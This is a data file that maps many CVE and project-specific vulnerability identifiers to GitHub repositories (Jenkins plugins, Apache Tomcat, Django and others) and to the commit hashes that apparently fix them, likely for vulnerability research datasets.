-CVE-2016-8640;https://github.com/geopython/pycsw;None:None;False;2565ab332d3ccae328591ea9054d0387a90f2e86; -CVE-2019-10682;https://github.com/relekang/django-nopassword;None:None;False;d8b4615f5fbfe3997d96cf4cb3e342406396193c; -CVE-2018-1313;https://github.com/apache/derby;None:None;False;4da5b2db5f3a60c1fa8ef616d88a7efe28b0c9d; -CVE-2009-3555-JETTY;https://github.com/eclipse/jetty.project;None:None;False;102625b86c8e82e0e3d02a71028ba62795aff52b,b4390f98529fce165e6394b94122b427fdfb8a5e,b90ad09443e1771e37d23e393afe842759c20454; -CVE-2018-1000105;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;a222f2d9d1bca3422e6a462a7f587ae325455b80; -JAVAMELODY-631;https://github.com/javamelody/javamelody;None:None;False;dd8816863d8d943f819a3fa797c349236e7546d4; -OIC-349;https://github.com/OpenIDC/pyoidc;None:None;False;64665112587ef43a57cb09442dd5dd3d175f583e; -CVE-2017-1000400;https://github.com/jenkinsci/jenkins;None:None;False;b2083a387a5bdb6f7ee7f7c81a1f6312aca2a558; -PLANEMO-45096;https://github.com/galaxyproject/planemo;None:None;False;1facb88bb6268812901291f27444cf7cdc9b9d85; -CVE-2019-1003016;https://github.com/jenkinsci/job-import-plugin;None:None;False;1d81e59330d371d15d3672dabc17d35dcd9fb824; -CVE-2019-16786;https://github.com/Pylons/waitress;None:None;False;f11093a6b3240fc26830b6111e826128af7771c3; -CVE-2017-4995;https://github.com/spring-projects/spring-security;None:None;False;5dee8534cd1b92952d10cc56335b5d5856f48f3b; -HOMEASSISTANT-001;https://github.com/home-assistant/home-assistant;None:None;False;0f12b37977766647dcc34a0189b37c7379b5f665; -CVE-2021-21292;https://github.com/traccar/traccar;None:None;False;cc69a9907ac9878db3750aa14ffedb28626455da; -DJANGO-STORAGES-001;https://github.com/jschneier/django-storages;None:None;False;6ee6a739752923c60eaa1e82262c1d07208ec7f6; -CVE-2015-8034;https://github.com/saltstack/salt;None:None;False;097838ec0c52b1e96f7f761e5fb3cd7e79808741; -CVE-2021-21318;https://github.com/opencast/opencast;None:None;False;b18c6a7f81f08ed14884592a6c14c9ab611ad450; -CVE-2020-26116;https://github.com/python/cpython;None:None;False;ca75fec1ed358f7324272608ca952b2d8226d11,f02de961b9f19a5db0ead56305fe0057a78787a,27b811057ff5e93b68798e278c88358123efdc7,524b8de630036a29ca340bc2ae6fd6dc7dda8f4,668d321476d974c4f51476b33aaca870272523b,8ca8a2e8fb068863c1138f07e3098478ef8be12; -CVE-2019-15486;https://github.com/ierror/django-js-reverse;None:None;False;78d6aff2276f2d341f643b095515f8aaba5e67c2; -CVE-2019-16552;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;bdc94d3e23df0ad6a64565c732498f89ff743b51; -CVE-2018-1000054;https://github.com/jenkinsci/ccm-plugin;None:None;False;066cb43b4413b3490d822ec8b8a32072ebd213ca; -CVE-2018-7536;https://github.com/django/django;None:None;False;1ca63a66ef3163149ad822701273e8a1844192c; -CVE-2020-13952;https://github.com/apache/incubator-superset;None:None;False;465572325b6c880b81189a94a27417bbb592f540; -CVE-2021-21238;https://github.com/IdentityPython/pysaml2;None:None;False;1d8fd268f5bf887480a403a7a5ef8f048157cc14; -CVE-2013-2071;https://github.com/apache/tomcat;None:None;False;f505d993d47d75d762c632cef6a622928ed4bcd6; -CVE-2018-1000410;https://github.com/jenkinsci/jenkins;None:None;False;7366cc50106442a021c5178cd101057ecc08f2c2; -CVE-2019-1003043;https://github.com/jenkinsci/slack-plugin;None:None;False;0268bbefdcc283effd27be5318770f7e75c6f102; -CVE-2019-10459;https://github.com/jenkinsci/mattermost-plugin;None:None;False;c6e509307812d93ba295a35dea95016f007de158; -CVE-2020-11979;https://github.com/apache/ant;None:None;False;87ac51d3c22bcf7cfd0dc07cb0bd04a496e0d428; -CVE-2012-0213;https://github.com/apache/poi;None:None;False;25bc679244188d63de690354db0e3f301291e252; -CVE-2018-1000843;https://github.com/spotify/luigi;None:None;False;06e3d9163c36f347cef09d9442aff55a10660f31; -CVE-2019-10362;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;b48a292112c532ab1447b864c7d30c2cae733ac8; -CVE-2012-5633;https://github.com/apache/cxf;None:None;False;db11c9115f31e171de4622149f157d8283f6c720,94a98b3fe9c79e2cf3941acbbad216ba54999bc0,1a6b532d53a7b98018871982049e4b0c80dc837c; -CVE-2009-0038;https://github.com/apache/geronimo;None:None;False;f8a612df7b06729bfd6c826e1a110d4bb40dc1f5,67dda0760bb0925ead201ddd5d809ff53686d63f,aa0c2c26dde8930cad924796af7c17a13d236b16; -CVE-2019-10366;https://github.com/jenkinsci/skytap-cloud-plugin;None:None;False;167986a84d1d15b525eaf0232b1c1a7c47aef670; -CVE-2018-16984;https://github.com/django/django;None:None;False;bf39978a53f117ca02e9a0c78b76664a41a54745; -CVE-2019-10365;https://github.com/jenkinsci/google-kubernetes-engine-plugin;None:None;False;544358bb731986a3269ee1a631405ea7668b72ac,c45a917eea3702e2b9678b13bbe6e58b41cfc8d3,cdd4d1b671dc1dd87976da5aa9d1375f929f6bd1; -CVE-2007-0450;https://github.com/apache/tomcat;None:None;False;1735d7f55094c3775c7d94e4f8568336dbe1a738; -MSGPACK-001;https://github.com/msgpack/msgpack-python;None:None;False;3b80233592674d18c8db7a62fa56504a5a285296; -DJANGO-30307;https://github.com/django/django;None:None;False;1279fb4a00c23ab0b9aeff8dd205661d4e9a811; -ZEPPELIN-2769;https://github.com/apache/zeppelin;None:None;False;709c5a70a8f37277c9eea0a1c0c9195b5eb21a74; -CVE-2017-1000354;https://github.com/jenkinsci/jenkins;None:None;False;02d24053bdfeb219d2387a19885a60bdab510479; -CVE-2011-2481;https://github.com/apache/tomcat;None:None;False;65cd282402881030b0c32a4b0cbfa1fbf4bbe721,a45c93e3c9139d70a207a7299f326b4831c2e544,3ab7d6be13fd59b872bb5c3745ca06035e15ba3f; -CVE-2019-10329;https://github.com/jenkinsci/influxdb-plugin;None:None;False;bfc2fcc0d8e6fb6f2dff5a45353abac5cefc0573; -CVE-2019-1003093;https://github.com/jenkinsci/nomad-plugin;None:None;False;3331d24896b815c375e528207c5572e18631c49d; -CVE-2016-6651;https://github.com/cloudfoundry/uaa;None:None;False;0ed081c9b515014a21954db0dc03a3ddbb30fac; -CVE-2016-0763;https://github.com/apache/tomcat;None:None;False;c08641da04d31f730b56b8675301e55db97dfe88,bc8717f41a379e812ffbbae2dd71ae6822fe680f,0531f7aeff1999d362e0a68512a3517f2cf1a6ae; -CVE-2019-10335;https://github.com/jenkinsci/electricflow-plugin;None:None;False;1a90ee7727f8c6925df3e410837ddf6be28cce53; -CVE-2020-2093;https://github.com/jenkinsci/cloudbees-jenkins-advisor-plugin;None:None;False;f53fe8a41a1566fdd7d2996779f6c5684ef3e2df; -CVE-2020-15275;https://github.com/moinwiki/moin-1.9;None:None;False;64e16037a60646a4d834f0203c75481b9c3fa74c; -CVE-2018-1000107;https://github.com/jenkinsci/ownership-plugin;None:None;False;42487df17cd272e504d3cd3e09abb4904f80dba2; -CVE-2017-1000242;https://github.com/jenkinsci/git-client-plugin;None:None;False;75ea3fe05650fc6ca09046a72493e2b3f066fb98; -CVE-2018-1000809;https://github.com/privacyidea/privacyidea;None:None;False;189312a99b499fe405fd3df5dd03a6b19ba66d46; -CVE-2018-1000425;https://github.com/jenkinsci/sonarqube-plugin;None:None;False;d1fe7cf3c46b2cf9f3629af87a7126a4007a52fd; -CVE-2019-10868;https://github.com/tryton/trytond;None:None;False;0ab5ef4631b1ed9a7cc1091bc0b841b3c014f668; -CVE-2020-26280;https://github.com/OpenSlides/OpenSlides;None:None;False;f3809fc8a97ee305d721662a75f788f9e9d21938; -CVE-2017-12634;https://github.com/apache/camel;None:None;False;2ae645e90edff3bcc1b958cb53ddc5e60a7f49f,adc06a78f04c8d798709a5818104abe5a8ae4b3; -CVE-2021-3281;https://github.com/django/django;None:None;False;02e6592835b4559909aa3aaaf67988fef435f62,21e7622dec1f8612c85c2fc37fe8efbfd3311e3,52e409ed17287e9aabda847b6afe58be2fa9f86; -CVE-2020-26258;https://github.com/x-stream/xstream;None:None;False;6740c04b217aef02d44fba26402b35e0f6f493ce; -CVE-2020-8570;https://github.com/kubernetes-client/java;None:None;False;eb2cfe945c1492503b086606734530550630d31f; -DJANGO-REQUEST-LOGGING-95;https://github.com/Rhumbix/django-request-logging;None:None;False;4674923482908788de345389d213a8d188505839; -CVE-2019-10289;https://github.com/jenkinsci/netsparker-cloud-scan-plugin;None:None;False;cce62d7188f12ab9cf1d5272eb859beb710d521a; -CVE-2014-3529;https://github.com/apache/poi;None:None;False;5f7a447c7b33662a32bd1f24dfc90ce9e46627c7,55d026a89ec849f6fdd611f7baabcc9e22d146b7,526abfe065b91c8baa02fd92918604e024764b82,6d1b0291c52c70486c25a18db4de962472910d64,4c9a4c36169364d457d9a27947a71cc2d21c2119; -JINJA-001;https://github.com/pallets/jinja;None:None;False;74bd64e56387f5b2931040dc7235a3509cde1611,9b53045c34e61013dc8f09b7e52a555fa16bed16; -CVE-2020-25640;https://github.com/jms-ra/generic-jms-ra;None:None;False;e431eecc0b91731e5702a46aa889c2242c72b9a6; -CVE-2021-21613;https://github.com/jenkinsci/tics-plugin;None:None;False;a64493ccf81a241c5e51736721c4fe9a3e56622b; -CVE-2020-27589;https://github.com/blackducksoftware/hub-rest-api-python;None:None;False;273b27d0de1004389dd8cf43c40b1197c787e7cd; -CVE-2020-15147;https://github.com/Cog-Creators/Red-DiscordBot;None:None;False;bf581b9f9711f89aafe838815e719a54b6b45924; -CVE-2018-20245;https://github.com/apache/airflow;None:None;False;66d0d05ea0802aec407e0ef5435a962080db0926; -CVE-2016-2048;https://github.com/django/django;None:None;False;adbca5e4db42542575734b8e5d26961c8ada7265; -CVE-2015-9543;https://github.com/openstack/nova;None:None;False;26d4047e17eba9bc271f8868f1d0ffeec97b555e; -CVE-2020-10799;https://github.com/deeplook/svglib;None:None;False;d6d08c4323a3656ee5ebe9a072a6e6237efde800; -CVE-2019-10306;https://github.com/jenkinsci/ontrack-plugin;None:None;False;7f0f806c18fdd6043103d848ba4c813cb805dd85; -CVE-2021-20250;https://github.com/wildfly/jboss-ejb-client;None:None;False;54331f5828b698eae6bff8e1c27f169048c15f8d; -CVE-2018-16407;https://github.com/mayan-edms/mayan-edms;None:None;False;076468a9225e4630a463c0bbceb8e5b805fe380c; -CVE-2018-17228;https://github.com/narkisr/nmap4j;None:None;False;06b58aa3345d2f977553685a026b93e61f0c491e; -CVE-2017-16763;https://github.com/bbengfort/confire;None:None;False;8cc86a5ec2327e070f1d576d61bbaadf861597ea; -CVE-2019-7537;https://github.com/pytroll/donfig;None:None;False;1f9dbf83b17419a06d63c14ef3fbd29dbc1b8ce5; -CVE-2020-15250;https://github.com/junit-team/junit4;None:None;False;610155b8c22138329f0723eec22521627dbc52ae; -CVE-2018-11765;https://github.com/apache/hadoop;None:None;False;94b0df839d36cf5d5e927b3642566c67d0689474; -CVE-2014-2064;https://github.com/jenkinsci/jenkins.git;None:None;False;fbf96734470caba9364f04e0b77b0bae7293a1ec; -CVE-2016-6801;https://github.com/apache/jackrabbit;None:None;False;eae001a54aae9c243ac06b5c8f711b2cb2038700,7fb4ba4a385069378c916b4fac3f145db802acd8,1a419283c3e272bbff6aa731b6eeeefdcb303182,b045c2cb795cc5115456a81cccb164f2bfe043a9,e80b756356610cba4d9537ea08337a53a6db9fb1,3ef204b4db2d43b9322141c92ebd4780639ae49a,5ed6a736b5c75842c3430e7504e324bd775c6440,ea75d7c2aeaafecd9ab97736bf81c5616f703244,fb4fe3601717201934bcbf6eb604d2e1ef2cb7ad,991cc31a6cc3a5f87fa7951afb939ff7859db789,0c00609a172b3af3b86a01abbf5ed473214702ba,9e08618c73a852710cfd9904b8558ceb5c1b754c,16f2f02fcaef6202a2bf24c449d4fd10eb98f08d; -CVE-2013-0239;https://github.com/apache/cxf;None:None;False;295a4e2f9eb3e7e0513980202949ccc424dee2d4; -CVE-2017-7481;https://github.com/ansible/ansible;None:None;False;ed56f51f185a1ffd7ea57130d260098686fcc7c2; -CVE-2017-1000243;https://github.com/jenkinsci/favorite-plugin;None:None;False;b6359532fe085d9ea6b7894e997e797806480777; -CVE-2014-3678;https://github.com/jenkinsci/monitoring-plugin;None:None;False;f0f6aeef2032696c97d4b015dd51fa2b841b0473; -CVE-2010-1632;https://github.com/apache/axis-axis2-java-core;None:None;False;026d9037c3040580c2b04d8d8e4691c33a933418,dbb2a3d37baf651f34b3bb064badb0e2c377f46b; -CVE-2019-14864;https://github.com/ansible/ansible;None:None;False;c76e074e4c71c7621a1ca8159261c1959b5287af; -CVE-2018-1000412;https://github.com/jenkinsci/jira-plugin;None:None;False;612a6ef06dbd5a63bea0b128142c726e96195eda; -CVE-2015-1833;https://github.com/apache/jackrabbit;None:None;False;4fee7534a6c12d3d0bf79d6d991c019fba4dd017,85aa90d9259a3256bbbda10e1e474669e5ca2f41,2d98103d8f49fd4766624933ca02f4d54b79fada,bbd9a764e235c4b6cb4b1912fb688eaaf63df89e,cfc2df1f3ac6739e79a455c08cbfc926e6d55523,ff07ebc1230db0deea15b4a0508eb28e3c81f3ee,4c8211cad02fba2082579c58eb36582129166a9c; -CVE-2014-6633;https://github.com/tryton/trytond;None:None;False;13b9fce7296a6301343ab67fab2f1a1af61e4bb0,397765e3e2b2a3b6fbba886396bf9aa047e74a99; -CVE-2021-21240;https://github.com/httplib2/httplib2;None:None;False;bd9ee252c8f099608019709e22c0d705e98d26bc; -CVE-2019-9740;https://github.com/urllib3/urllib3;None:None;False;9b76785331243689a9d52cef3db05ef7462cb02d,efddd7e7bad26188c3b692d1090cba768afa9162; -CVE-2019-1003001;https://github.com/jenkinsci/jenkins;None:None;False;fa832c58b06556d9d3e0224be28f9c8673f3230b; -CVE-2017-1000355;https://github.com/jenkinsci/jenkins;None:None;False;701ea95a52afe53bee28f76a3f96eb0e578852e9; -CVE-2018-15531;https://github.com/javamelody/javamelody;None:None;False;ef111822562d0b9365bd3e671a75b65bd0613353; -CVE-2020-8929;https://github.com/google/tink;None:None;False;93d839a5865b9d950dffdc9d0bc99b71280a8899; -CVE-2014-3577;https://github.com/apache/httpcomponents-client;None:None;False;51cc67567765d67f878f0dcef61b5ded454d3122; -CVE-2008-5518;https://github.com/apache/geronimo;None:None;False;aa0c2c26dde8930cad924796af7c17a13d236b16,f8a612df7b06729bfd6c826e1a110d4bb40dc1f5,67dda0760bb0925ead201ddd5d809ff53686d63f; -CVE-2014-0034;https://github.com/apache/cxf;None:None;False;b4b9a010bb23059251400455afabddee15b46127; -CVE-2013-4444;https://github.com/apache/tomcat;None:None;False;482ab8200a0c8df905b7f40c15bc5649bd5350d9; -CVE-2014-0107;https://github.com/apache/xalan-j;None:None;False;cbfd906cc5a1f1566fa1a98400c82e56077fae0c; -ARMERIA-CPJ2;https://github.com/line/armeria;None:None;False;80310b36196b6fa6efd15af61635d2aa48c44418; -CVE-2018-1000167;https://github.com/OISF/suricata-update;None:None;False;76270e73128ca1299b4e33e7e2a74ac3d963a97a; -CVE-2019-20916;https://github.com/pypa/pip;None:None;False;5776ddd05896162e283737d7fcdf8f5a63a97bbc; -CVE-2021-25122;https://github.com/apache/tomcat;None:None;False;dd757c0a893e2e35f8bc1385d6967221ae8b9b9,bb0e7c1e0d737a0de7d794572517bce0e91d30f,d47c20a776e8919eaca8da9390a32bc8bf8210b; -CVE-2017-7674;https://github.com/apache/tomcat;None:None;False;b94478d45b7e1fc06134a785571f78772fa30fed,9044c1672bbe4b2cf4c55028cc8b977cc62650e7,f52c242d92d4563dd1226dcc993ec37370ba9ce3,52382ebfbce20a98b01cd9d37184a12703987a5a; -CVE-2019-11236;https://github.com/urllib3/urllib3;None:None;False;0aa3e24fcd75f1bb59ab159e9f8adb44055b2271; -CVE-2019-1003025;https://github.com/jenkinsci/cloudfoundry-plugin;None:None;False;61208697f60b91ad7f03a4dcec391b6d2115abca; -CVE-2020-26891;https://github.com/matrix-org/synapse;None:None;False;34ff8da83b54024289f515c6d73e6b486574d69; -CVE-2020-25592;https://github.com/saltstack/salt;None:None;False;daa39c58370641913aa8d5a7a0f44254973dd66b; -CVE-2019-18212;https://github.com/angelozerr/lsp4xml;None:None;False;c3af46f73eefdda66386cb61bf6b7125009d4ecc; -CVE-2021-24122;https://github.com/apache/tomcat;None:None;False;7f004ac4531c45f9a2a2d1470561fe135cf27bc,800b03140e640f8892f27021e681645e8e32017,920dddbdb981f92e8d5872a4bb126a10af5ca8a,935fc5582dc25ae10bab6f9d5629ff8d996cb53; -CVE-2018-1000864;https://github.com/jenkinsci/jenkins;None:None;False;73afa0ca786a87f05b5433e2e38f863826fcad17; -CVE-2013-4347;https://github.com/joestump/python-oauth2;None:None;False;82dd2cdd4954cd7b8983d5d64c0dfd9072bf4650; -CVE-2016-6817;https://github.com/apache/tomcat;None:None;False;079372fc7bac8e2e378942715c9ce26a4a72c07a,85c63227edabbfb4f2f500fc557480a190135d21; -CVE-2014-3498;https://github.com/ansible/ansible;None:None;False;8ed6350e65c82292a631f08845dfaacffe7f07f5; -CVE-2014-2067;https://github.com/jenkinsci/jenkins.git;None:None;False;5d57c855f3147bfc5e7fda9252317b428a700014; -CVE-2015-5346;https://github.com/apache/tomcat;None:None;False;f58aa9f5273e08c56389af344910302b7c078321,41fbee7ba15435a831f765597ff907c56ebf2169,6287be37d8d06c320215c45f7e2b8380411692e0,0dd9e7811a06e0e131da734eb706a1db4a77119c,c39b7ffc2145644f7f3cf9e3cd4aada5048e56a0; -CVE-2020-13926;https://github.com/apache/kylin;None:None;False;9fc77eb523aab5aa0299888280241a84b64c4457; -CVE-2013-1777;https://github.com/apache/geronimo;None:None;False;ee031c5e62b0d358250d06c2aa6722518579a6c5; -CVE-2014-0086;https://github.com/pslegr/core-1.git;None:None;False;8131f15003f5bec73d475d2b724472e4b87d0757; -CVE-2021-20328;https://github.com/mongodb/mongo-java-driver;None:None;False;dcd67f113549276b44795243d41a442e821d2f5,0b441990d8621979c68a45586187f8a12c003f6,2d95b7e8d3bf6175e3e7a22e48c88243e6aa45d,2e258a502b3242b0dd7d5a5952e5cd219fce4c4,60d87d5a76645a331a77ccc45ef7c67aac88b23,ae5b1c0644456f1cf195846a37eea82f6248f81; -CVE-2015-8213;https://github.com/django/django;None:None;False;9f83fc2f66f5a0bac7c291aec55df66050bb699; -CVE-2020-11001;https://github.com/wagtail/wagtail;None:None;False;61045ceefea114c40ac4b680af58990dbe732389; -CVE-2018-8016;https://github.com/beobal/cassandra;None:None;False;28ee665b3c0c9238b61a871064f024d54cddcc79; -CVE-2018-1999027;https://github.com/jenkinsci/saltstack-plugin;None:None;False;5306bcc438ff989e4b1999a0208fd6854979999b; -CVE-2017-7893;https://github.com/saltstack/salt;None:None;False;0a0f46fb1478be5eb2f90882a90390cb35ec43cb; -CVE-2020-28491;https://github.com/FasterXML/jackson-dataformats-binary;None:None;False;de072d314af8f5f269c8abec6930652af67bc8e6; -CVE-2014-1830;https://github.com/requests/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,fe4c4f146124d7fba2e680581a5d6b9d98e3fdf8,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,97cf16e958a948ecf30c3019ae94f2e7ec7dcb7f; -CVE-2020-26263;https://github.com/tlsfuzzer/tlslite-ng;None:None;False;c28d6d387bba59d8bd5cb3ba15edc42edf54b368; -APACHE-AXIS2-5846;https://github.com/apache/axis2-java;None:None;False;65aaacc779530682887bc6da4099b5ec4cfab406; -CVE-2017-12197;https://github.com/letonez/libpam4j;None:None;False;84f32f4001fc6bdcc125ccc959081de022d18b6d; -CVE-2019-10156;https://github.com/bcoca/ansible;None:None;False;b9b0b230150eceb442c34c917d9e852d5e8b7371; -HTTPCLIENT-1803;https://github.com/apache/httpcomponents-client;None:None;False;0554271750599756d4946c0d7ba43d04b1a7b22; -CVE-2020-27222;https://github.com/eclipse/californium;None:None;False;00ab1d9fe07a24229a88ac87786fe3a0752374ab; -CVE-2019-10357;https://github.com/jenkinsci/workflow-cps-global-lib-plugin;None:None;False;6fce1e241d82641e8648c546bc63c22a5e07e96b; -CVE-2018-1999046;https://github.com/jenkinsci/jenkins;None:None;False;6867e4469525d16319b1bae9c840b933fe4e23c4; -CVE-2019-10392;https://github.com/jenkinsci/git-client-plugin;None:None;False;899123fa2eb9dd2c37137aae630c47c6be6b4b02; -CVE-2014-1932;https://github.com/python-pillow/Pillow;None:None;False;4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7; -CVE-2020-13925;https://github.com/apache/kylin;None:None;False;335d61b62517006d7e7b55638bb6fd305dffbea1; -CVE-2020-11078;https://github.com/httplib2/httplib2;None:None;False;a1457cc31f3206cf691d11d2bf34e98865873e9e; -CVE-2020-27619;https://github.com/python/cpython;None:None;False;2ef5caa58febc8968e670e39e3d37cf8eef3cab,43e523103886af66d6c27cd72431b5d9d14cd2a,6c6c256df3636ff6f6136820afaefa5a10a3ac3,b664a1df4ee71d3760ab937653b10997081b179,e912e945f2960029d039d3390ea08835ad39374; -CVE-2016-6186;https://github.com/django/django;None:None;False;d03bf6fe4e9bf5b07de62c1a271c4b41a7d3d15; -CVE-2019-10363;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;7506d50b846460ec9f4506f0e228d2e44f0d5a3e; -CVE-2017-7233;https://github.com/django/django;None:None;False;5ea48a70afac5e5684b504f09286e7defdd1a81a; -CVE-2019-10429;https://github.com/jenkinsci/gitlab-logo-plugin;None:None;False;1a64595353df91b5fcf2d9336fa627e06ef1f8a9; -CVE-2012-0803;https://github.com/apache/cxf;None:None;False;40f98d3448abf19fbb59a1a154ce104db650346b; -CVE-2012-4534;https://github.com/apache/tomcat;None:None;False;2bfb3fbd7ea1c58646f84d72029088baf418e486; -CVE-2020-11981;https://github.com/astronomer/airflow;None:None;False;4aea266a653b5211180183e9d7be63f7a0d2c223; -CVE-2019-1003012;https://github.com/jenkinsci/blueocean-plugin;None:None;False;1a03020b5a50c1e3f47d4b0902ec7fc78d3c86ce; -CVE-2018-1000548;https://github.com/umlet/umlet;None:None;False;e1c4cc6ae692cc8d1c367460dbf79343e996f9bd; -CVE-2019-10340;https://github.com/jenkinsci/docker-plugin;None:None;False;6ad27199f6fad230be72fd45da78ddac85c075db; -HENOSIS-001;https://github.com/vc1492a/henosis;None:None;False;0802302430e6f6a17b22a55ce3d9360656f3c8ba; -CVE-2018-1320;https://github.com/apache/thrift;None:None;False;d973409661f820d80d72c0034d06a12348c8705e; -CVE-2021-21239;https://github.com/IdentityPython/pysaml2;None:None;False;46578df0695269a16f1c94171f1429873f90ed99; -CVE-2020-25074;https://github.com/moinwiki/moin-1.9;None:None;False;6b96a9060069302996b5af47fd4a388fc80172b7; -CVE-2017-0359;https://salsa.debian.org/reproducible-builds/diffoscope.git;None:None;False;632a40828a54b399787c25e7fa243f732aef7e05; -CVE-2016-3092;https://github.com/apache/tomcat;None:None;False;2c3553f3681baf775c50bb0b49ea61cb44ea914f,d752a415a875e888d8c8d0988dfbde95c2c6fb1d,8999f8243197a5f8297d0cb1a0d86ed175678a77; -CVE-2019-7617;https://github.com/elastic/apm-agent-python;None:None;False;47286d746e05897c6b3af8d465aa56ab1ed8d678; -ND4J-001;https://github.com/deeplearning4j/deeplearning4j;None:None;False;f51f4242d67eed9c97a46051cc0c6c72d0830a27; -CVE-2013-4435;https://github.com/saltstack/salt;None:None;False;07972eb0a6f985749a55d8d4a2e471596591c80d,6a9752cdb1e8df2c9505ea910434c79d132eb1e2,6d8ef68b605fd63c36bb8ed96122a75ad2e80269,8e5afe59cef6743fe5dbd510dcf463dbdfca1ced,aca78f314481082862e96d4f0c1b75fa382bb885,1e3f197726aa13ac5c3f2416000089f477f489b5,7f190ff890e47cdd591d9d7cefa5126574660824,b73677435ba54ecfc93c1c2d840a7f9ba6f53410,ebdef37b7e5d2b95a01d34b211c61c61da67e46a; -CVE-2019-1003048;https://github.com/jenkinsci/prqa-plugin;None:None;False;6df96d7bd96dd9ef69575f43dc0e06a168d59b37,f6d8492a8279fdfe9e3652bd01a6809fb5f296b6; -CVE-2017-5651;https://github.com/apache/tomcat;None:None;False;494429ca210641b6b7affe89a2b0a6c0ff70109b,9233d9d6a018be4415d4d7d6cb4fe01176adf1a8; -CVE-2020-13654;https://github.com/xwiki/xwiki-platform;None:None;False;82c31ea56be4ac756140f082d216268e1dca6ac8; -CVE-2020-17534;https://github.com/apache/netbeans-html4j;None:None;False;fa70e507e5555e1adb4f6518479fc408a7abd0e6; -CVE-2021-22114;https://github.com/spring-projects/spring-integration-extensions;None:None;False;ad398071e205b24c0fb58ae7401ac4a97a7cf759; -RESTVIEW-001;https://github.com/mgedmin/restview;None:None;False;ef8d9e155dc4f4ca934bd5aa26ab36fb94b6e89b; -CVE-2019-16785;https://github.com/Pylons/waitress;None:None;False;8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba; -CVE-2018-17187;https://github.com/apache/qpid-proton-j;None:None;False;0cb8ca03cec42120dcfc434561592d89a89a805e; -CVE-2018-1999044;https://github.com/jenkinsci/jenkins;None:None;False;e5046911c57e60a1d6d8aca9b21bd9093b0f3763; -CVE-2015-1839;https://github.com/saltstack/salt;None:None;False;22d2f7a1ec93300c34e8c42d14ec39d51e610b5c,b49d0d4b5ca5c6f31f03e2caf97cef1088eeed81; -CVE-2019-10412;https://github.com/jenkinsci/inedo-proget-plugin;None:None;False;9634846c65f204c2b54237674b2cecf66d5d5fdb; -CVE-2020-11054;https://github.com/qutebrowser/qutebrowser;None:None;False;3a5439d4c49b748fd4f8eff423dcfc5fab89941,472a0eca380290696dd0e2619fdb512564adbbc,53e297ad81c75cb3668232396918eb07e2ce2d4,556fe81b3146e5cd2e77df9d8ce57aebbbd72ea,f5d801251aa5436aff44660c87d7013e29ac586,1b7ffca4ed971724c6ebd6ffe004729cc463eec,4020210b193f77cf1785b21717f6ef7c5de5f0f,6821c236f9ae23adf21d46ce0d56768ac8d0c46,a45ca9c788f648d10cccce2af41405bf25ee294,d28ed758d077a5bf19ddac4da468f7224114df2,021ab572a319ca3db5907a33a59774f502b3b97,19f01bb42d02da539446a52a25bb0c1232b8632,2281a205c3e70ec20f35ec8fafecee0d5c4f347,45a2be3f9f32f900c0b567998433d43055f722e,f109c922e8169211fafc5dfbb35be50e24486f9,454d4c881f7d2d195fdda65e10943d5ab45e113,9bd1cf585fccdfe8318fff7af793730e74a04db,a92f37b0d6673b12def3a3dfd9c6cf01e8c28b4; -CVE-2014-0111;https://github.com/apache/syncope;None:None;False;f34772c918a4dd4dac2b01d79b51b701184c6658,46864183920323eb5e64780919455dd880585d8d; -CVE-2018-16876;https://github.com/ansible/ansible;None:None;False;ba4c2ebeac9ee801bfedff05f504c71da0dd2bc; -CVE-2020-17510;https://github.com/apache/shiro;None:None;False;6acaaee9bb3a27927b599c37fabaeb7dd6109403; -GEODE-4270;https://github.com/apache/geode;None:None;False;80ad2d70435fb255a8a2d08c8866fbb30a7bedd3; -CVE-2019-16540;https://github.com/jenkinsci/support-core-plugin;None:None;False;6b177ea7cc7347e13fa87174472400bbbe78d422; -CVE-2017-17835;https://github.com/apache/airflow;None:None;False;6aca2c2d395952341ab1b201c59011920b5a5c77; -HADOOP-12751;https://github.com/apache/hadoop;None:None;False;092b1997418c8042224d24751a8fdde7d39a9ed; -KNOWLEDGE-REPO-001;https://github.com/airbnb/knowledge-repo;None:None;False;5d6668206f0b3fa90c091e682b93867460501f11; -ASPEN-001;https://github.com/jaraco/aspen;None:None;False;296b1903c9a64f34b04cf7ea61a0585a36c56d2b; -CVE-2012-3451;https://github.com/apache/cxf;None:None;False;9c70abe28fbf2b4c4df0b93ed12295ea5a012554; -CVE-2019-10369;https://github.com/jenkinsci/jclouds-plugin;None:None;False;dd975cc394467c1bbd4d91104094b62157bcfdfc; -CVE-2019-1003037;https://github.com/jenkinsci/azure-vm-agents-plugin;None:None;False;e36c8a9b0a436d3b79dc14b5cb4f7f6032fedd3f; -CVE-2020-5427;https://github.com/spring-cloud/spring-cloud-dataflow;None:None;False;92fb903812ec3dcd2e28f39199b38d9465c7671c; -CVE-2019-10327;https://github.com/jenkinsci/pipeline-maven-plugin;None:None;False;e7cb858852c05d2423e3fd9922a090982dcd6392; -CVE-2019-10348;https://github.com/jenkinsci/gogs-webhook-plugin;None:None;False;34de11fe0822864c4c340b395dadebca8cb11844,55e00bc409a43f30539b0df5a3f20476268ece27; -CVE-2021-21234;https://github.com/lukashinsch/spring-boot-actuator-logview;None:None;False;760acbb939a8d1f7d1a7dfcd51ca848eea04e772; -CVE-2015-6938;https://github.com/jupyter/notebook;None:None;False;35f32dd2da804d108a3a3585b69ec3295b2677e; -CVE-2017-1000390;https://github.com/jenkinsci/tikal-multijob-plugin;None:None;False;3e6ab85019334a5b2a438264afdebe439cfc82b4,2424cec7a099fe4392f052a754fadc28de9f8d86; -CVE-2020-25032;https://github.com/corydolphin/flask-cors;None:None;False;67c4b2cc98ae87cf1fa7df4f97fd81b40c79b895; -CVE-2019-12400;https://github.com/apache/santuario-java;None:None;False;1a0f8cbf449b73e1549149b8b173aa5c1c315eed,267b8528d20a0bc09ed56d7c8b03ac4126464621,52ae824cf5f5c873a0e37bb33fedcc3b387cdba6,c5210f77a77105fba81311d16c07ceacc21f39d5; -CVE-2018-1000814;https://github.com/aio-libs/aiohttp-session;None:None;False;1b356f01bbab57d041c9a75bacd72fbbf8524728; -CVE-2018-1000807;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; 